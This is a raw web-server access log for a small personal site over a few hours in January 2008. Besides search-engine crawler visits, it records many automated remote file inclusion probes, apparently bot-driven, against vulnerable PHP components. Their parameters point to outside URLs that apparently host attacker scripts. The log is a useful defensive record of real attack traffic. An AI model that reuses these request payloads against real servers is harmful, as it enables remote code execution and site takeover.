74.6.8.71 - - [03/Jan/2008:21:32:07 -0800] "GET /logs/access_071229.log HTTP/1.0" 200 314379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.57.128.49 - - [03/Jan/2008:21:34:11 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://wooshck.org/rotation/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:21:39:51 -0800] "GET /logs/access_071224.log/akocomments.php?mosConfig_absolute_path=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:21:39:52 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:21:39:52 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:21:40:12 -0800] "GET /logs/access_071224.log/akocomments.php?mosConfig_absolute_path=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:21:40:12 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:21:40:12 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:21:40:18 -0800] "GET /logs/access_071224.log/akocomments.php?mosConfig_absolute_path=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:21:40:18 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.56.187.186 - - [03/Jan/2008:21:40:19 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.29.32 - - [03/Jan/2008:21:40:33 -0800] "GET /?N=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.54.177.55 - - [03/Jan/2008:21:41:40 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.177.55 - - [03/Jan/2008:21:41:41 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.177.55 - - [03/Jan/2008:21:41:42 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.128.49 - - [03/Jan/2008:21:44:49 -0800] "GET /logs/access_071224.log/akocomments.php?mosConfig_absolute_path=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.128.49 - - [03/Jan/2008:21:44:49 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.128.49 - - [03/Jan/2008:21:44:49 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.177.55 - - [03/Jan/2008:21:46:56 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.205.39 - - [03/Jan/2008:21:48:59 -0800] "GET /logs/access_071224.log/akocomments.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.205.39 - - [03/Jan/2008:21:49:00 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.205.39 - - [03/Jan/2008:21:49:00 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.136.19.139 - - [03/Jan/2008:21:50:54 -0800] "GET /logs/access_071224.log/akocomments.php?mosConfig_absolute_path=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.136.19.139 - - [03/Jan/2008:21:50:54 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.136.19.139 - - [03/Jan/2008:21:50:55 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.57.128.49 - - [03/Jan/2008:21:57:45 -0800] "GET /logs/access_071224.log/akocomments.php?mosConfig_absolute_path=http://wooshck.org/rotation/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.128.49 - - [03/Jan/2008:21:57:46 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://wooshck.org/rotation/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
8.6.221.188 - - [03/Jan/2008:22:00:01 -0800] "GET /logs/access_071224.log/akocomments.php?mosConfig_absolute_path=http://www.yinqixing.com/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.122.24 - - [03/Jan/2008:22:18:47 -0800] "GET /logs/access_071224.log/akocomments.php?mosConfig_absolute_path=http://www.yinqixing.com/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.234.122.24 - - [03/Jan/2008:22:18:47 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.yinqixing.com/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.234.122.24 - - [03/Jan/2008:22:18:47 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.yinqixing.com/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.80.193.52 - - [03/Jan/2008:22:22:30 -0800] "GET / HTTP/1.1" 200 2962 "-" "Mozilla/5.0 (compatible; Konqueror/3.0-rc2; i686 Linux; 20020409)" "www.dmulk.com"
193.207.106.54 - - [03/Jan/2008:22:24:50 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://thermair.co.uk//media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.8.71 - - [03/Jan/2008:22:25:23 -0800] "GET /bikes/?D=D HTTP/1.0" 200 2036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.19 - - [03/Jan/2008:22:36:54 -0800] "GET /?M=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
88.191.23.34 - - [03/Jan/2008:22:41:05 -0800] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.23.34 - - [03/Jan/2008:22:41:05 -0800] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.26.221 - - [03/Jan/2008:22:44:18 -0800] "GET /logs/access_070808.log HTTP/1.0" 200 84948 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.208.99.103 - - [03/Jan/2008:22:45:34 -0800] "GET /logs/access_071224.log/akocomments.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.99.103 - - [03/Jan/2008:22:45:39 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.99.103 - - [03/Jan/2008:22:45:44 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.23.34 - - [03/Jan/2008:22:46:39 -0800] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.23.34 - - [03/Jan/2008:22:46:39 -0800] "GET //administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.8.71 - - [03/Jan/2008:22:47:22 -0800] "GET / HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.28.22 - - [03/Jan/2008:22:48:01 -0800] "GET /logs/access_070919.log HTTP/1.0" 200 35028 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.71 - - [03/Jan/2008:22:49:53 -0800] "GET /mobileoffice/ HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.126.220.250 - - [03/Jan/2008:22:58:21 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://arrav.hatulosuploads.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.126.220.250 - - [03/Jan/2008:22:58:25 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://arrav.hatulosuploads.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.187.66.133 - - [03/Jan/2008:22:58:59 -0800] "GET /logs/access_071220.log//com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.187.66.133 - - [03/Jan/2008:22:58:59 -0800] "GET //com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.187.66.133 - - [03/Jan/2008:22:58:59 -0800] "GET /logs//com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.129.89.71 - - [03/Jan/2008:22:59:10 -0800] "GET /logs/access_071220.log//com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.129.89.71 - - [03/Jan/2008:22:59:10 -0800] "GET //com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.129.89.71 - - [03/Jan/2008:22:59:10 -0800] "GET /logs//com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.129.89.71 - - [03/Jan/2008:22:59:15 -0800] "GET /logs/access_071220.log//?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.129.89.71 - - [03/Jan/2008:22:59:15 -0800] "GET //?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
66.129.89.71 - - [03/Jan/2008:22:59:16 -0800] "GET /logs//?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 200 29130 "-" "libwww-perl/5.805" "www.dmulk.com"
216.187.66.133 - - [03/Jan/2008:22:59:48 -0800] "GET /logs/access_071220.log//?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.187.66.133 - - [03/Jan/2008:22:59:48 -0800] "GET //?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
216.187.66.133 - - [03/Jan/2008:22:59:48 -0800] "GET /logs//?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 200 28542 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.62.34 - - [03/Jan/2008:23:00:07 -0800] "GET /logs/access_071220.log//com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.62.34 - - [03/Jan/2008:23:00:07 -0800] "GET //com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.62.34 - - [03/Jan/2008:23:00:07 -0800] "GET /logs//com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.207.106.54 - - [03/Jan/2008:23:00:12 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://thermair.co.uk//media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.207.106.54 - - [03/Jan/2008:23:00:13 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://thermair.co.uk//media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.62.34 - - [03/Jan/2008:23:01:01 -0800] "GET /logs/access_071220.log//?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.62.34 - - [03/Jan/2008:23:01:01 -0800] "GET //?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 200 2962 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.62.34 - - [03/Jan/2008:23:01:01 -0800] "GET /logs//?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 200 28542 "-" "libwww-perl/5.79" "www.dmulk.com"
216.187.66.133 - - [03/Jan/2008:23:01:36 -0800] "GET /logs/access_071220.log//?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.187.66.133 - - [03/Jan/2008:23:01:36 -0800] "GET //?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
216.187.66.133 - - [03/Jan/2008:23:01:36 -0800] "GET /logs//?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 200 29130 "-" "libwww-perl/5.808" "www.dmulk.com"
200.196.254.164 - - [03/Jan/2008:23:02:54 -0800] "GET /logs/access_071220.log//com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.196.254.164 - - [03/Jan/2008:23:02:55 -0800] "GET //com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.196.254.164 - - [03/Jan/2008:23:02:55 -0800] "GET /logs//com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.196.254.164 - - [03/Jan/2008:23:04:18 -0800] "GET /logs/access_071220.log//?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.196.254.164 - - [03/Jan/2008:23:04:18 -0800] "GET //?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
200.196.254.164 - - [03/Jan/2008:23:04:18 -0800] "GET /logs//?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 200 28542 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.20.164 - - [03/Jan/2008:23:14:15 -0800] "GET /logs/access_071011.log HTTP/1.0" 200 23938 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.54.177.55 - - [03/Jan/2008:23:14:17 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.177.55 - - [03/Jan/2008:23:14:18 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.177.55 - - [03/Jan/2008:23:14:18 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.126.220.250 - - [03/Jan/2008:23:16:26 -0800] "GET /logs/access_071214.log//modules/vwar/admin/admin.php?vwar_root=http://arrav.hatulosuploads.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.126.220.250 - - [03/Jan/2008:23:16:27 -0800] "GET /logs/access_071214.log//modules/vwar/admin/admin.php?vwar_root=http://arrav.hatulosuploads.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.126.220.250 - - [03/Jan/2008:23:16:27 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://arrav.hatulosuploads.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.126.220.250 - - [03/Jan/2008:23:16:27 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://arrav.hatulosuploads.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.126.220.250 - - [03/Jan/2008:23:17:42 -0800] "GET /logs/access_071126.log//modules/vwar/admin/admin.php?vwar_root=http://arrav.hatulosuploads.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.126.220.250 - - [03/Jan/2008:23:17:45 -0800] "GET /logs/access_071126.log//modules/vwar/admin/admin.php?vwar_root=http://arrav.hatulosuploads.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.54.177.55 - - [03/Jan/2008:23:19:36 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.8.71 - - [03/Jan/2008:23:20:05 -0800] "GET /plans/?N=D HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.196.254.164 - - [03/Jan/2008:23:23:03 -0800] "GET /logs/access_071220.log//?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.196.254.164 - - [03/Jan/2008:23:23:04 -0800] "GET //?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
200.196.254.164 - - [03/Jan/2008:23:23:04 -0800] "GET /logs//?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 200 29130 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.58.118 - - [03/Jan/2008:23:30:27 -0800] "GET /index.php?option=com_autolinks&Itemid=&mosConfig_absolute_path=http://arnoldo.info/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
85.214.58.118 - - [03/Jan/2008:23:30:27 -0800] "GET /logs/index.php?option=com_autolinks&Itemid=&mosConfig_absolute_path=http://arnoldo.info/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
216.75.35.118 - - [03/Jan/2008:23:41:35 -0800] "GET /logs/access_071219.log//index.php?themesdir=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [03/Jan/2008:23:41:35 -0800] "GET //index.php?themesdir=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [03/Jan/2008:23:41:36 -0800] "GET /logs//index.php?themesdir=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.58.118 - - [03/Jan/2008:23:46:42 -0800] "GET /index.php?option=com_autolinks&Itemid=&mosConfig_absolute_path=http://arnoldo.info/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
85.214.58.118 - - [03/Jan/2008:23:46:42 -0800] "GET /logs/index.php?option=com_autolinks&Itemid=&mosConfig_absolute_path=http://arnoldo.info/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
74.6.28.220 - - [03/Jan/2008:23:49:56 -0800] "GET /_private/ HTTP/1.0" 403 163 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.145.49.15 - - [03/Jan/2008:23:54:38 -0800] "GET / HTTP/1.0" 200 2946 "-" "-" "dmulk.com"
74.6.8.71 - - [03/Jan/2008:23:55:04 -0800] "GET /bikes/dteel/ HTTP/1.0" 200 8117 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.34.145.201 - - [03/Jan/2008:23:59:47 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
64.34.145.201 - - [03/Jan/2008:23:59:48 -0800] "GET /minamijewelry/html/dream.html HTTP/1.0" 200 18218 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
66.249.70.241 - - [04/Jan/2008:00:00:00 -0800] "GET /megumi/earrings/9_Venetian_Olive_15.JPG HTTP/1.1" 200 2346379 "-" "Googlebot-Image/1.0" "www.dmulk.com"
74.6.8.71 - - [04/Jan/2008:00:05:06 -0800] "GET /funny/Mencanmultitask.asx HTTP/1.0" 200 817843 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.52.98.98 - - [04/Jan/2008:00:09:57 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.98.98 - - [04/Jan/2008:00:10:02 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.98.98 - - [04/Jan/2008:00:10:03 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.217.130 - - [04/Jan/2008:00:11:26 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.217.130 - - [04/Jan/2008:00:11:26 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.217.130 - - [04/Jan/2008:00:11:26 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.98.98 - - [04/Jan/2008:00:14:04 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.217.130 - - [04/Jan/2008:00:14:50 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.15.104.155 - - [04/Jan/2008:00:15:45 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.15.104.155 - - [04/Jan/2008:00:15:57 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.223.95.94 - - [04/Jan/2008:00:18:12 -0800] "GET /index.php?pageurl=http://www.surginet.info//modules/tinycontent/admin/spaw/.debug/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
83.223.95.94 - - [04/Jan/2008:00:18:12 -0800] "GET /logs/index.php?pageurl=http://www.surginet.info//modules/tinycontent/admin/spaw/.debug/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
